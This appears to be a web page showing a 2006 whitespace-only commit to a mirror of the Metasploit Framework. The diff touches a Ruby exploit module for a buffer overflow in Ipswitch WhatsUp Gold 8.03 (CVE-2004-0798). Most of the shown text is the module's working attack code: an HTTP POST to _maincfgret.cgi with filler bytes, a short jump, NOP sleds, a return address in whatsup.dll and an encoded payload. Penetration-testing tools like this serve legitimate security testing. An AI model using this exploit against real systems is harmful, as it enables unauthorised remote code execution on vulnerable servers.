infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fixed spacing... 

git-svn-id: file:///home/svn/framework3/trunk@4138 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2006-11-15 01:04:34 +00:00
parent dbb3cf8482
commit 6117311fe0
1 changed files with 14 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
modules/exploits/windows/http/ipswitch_wug_maincfgret.rb
View File

@ -20,13 +20,12 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
'References' =>
[
['BID', '11043'],
['CVE', '2004-0798'],
['CVE', '2004-0798'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
@ -39,7 +38,7 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
[
[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
],
'DefaultTarget' => 0,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 25 2004'))
register_options( [
@ -53,19 +52,19 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
def exploit
c = connect
num = rand(65535).to_s
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
num = rand(65535).to_s
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
req << "page=notify&origname=&action=return&type=Beeper&instancename="
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
sploit = c.request({
'uri' => '/_maincfgret.cgi',
'method' => 'POST',
'data' => req,
req = c.request({
'uri' => '/_maincfgret.cgi',
'method' => 'POST',
'data' => req,
})
print_status("Trying target %s..." % target.name)